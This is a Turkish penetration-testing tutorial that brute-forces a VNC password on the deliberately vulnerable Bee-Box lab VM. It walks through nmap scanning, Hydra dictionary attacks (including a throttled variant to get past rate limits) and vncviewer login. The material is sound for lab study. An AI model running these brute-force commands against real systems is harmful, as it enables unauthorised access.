Linux Hydra Aracı ile VNC Servisine Erişim Sağlayabilecek Parola Bilgilerinin Tespit Edilmesi

Sızma testleri sırasında, IP ve port bilgisi tespit edilen VNC servisine erişim sağlayabilecek parola bilgilerinin tespit edilmesi gerekebilmektedir. Bu yazıda, Linux Hydra aracı kullanılarak, kaba kuvvet (sözlük) saldırısı ile VNC uygulamasına erişim sağlanabilecek parola bilgileri elde edilecektir.

Yazıda kullanılan Bee-Box sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/

 

Bu sanal makine üzerinde VNC servisi hizmet vermektedir.

netstat -nlpt | grep vnc

 

192.168.133.159 IP adresli sanal makineye port taraması gerçekleştirildiğinde de 5901 portunda VNC servisinin hizmet verdiği görülebilmektedir.

nmap -Pn -n –open -p5900-5905 -sV 192.168.133.159

 

Bu servise kaba kuvvet saldırı için kullanılabilecek parolalar; “Parolalar” dosyasına kaydedilmiştir.

cat Parolalar

 

Hydra aracına bu parola dosyası verilerek kaba kuvvet saldırısı gerçekleştirilebilir.

hydra -P Parolalar vnc://192.168.133.159:5901

 

Not: Eğer VNC sunucusu üzerinde zaman/talep bazlı bir kısıtlama varsa, eş zamanlı talep sayısı azaltılabilir ve talepler arasındaki süre arttırılabilir.

hydra -P Parolalar vnc://192.168.133.159:5901 -t 1 -W 30

 

Elde edilen parola bilgisi ile VNC erişimi elde edilebilir.

vncviewer 192.168.133.159:5901

 

Kaynak:

https://paulsec.github.io/blog/2014/04/21/bwapp-write-up/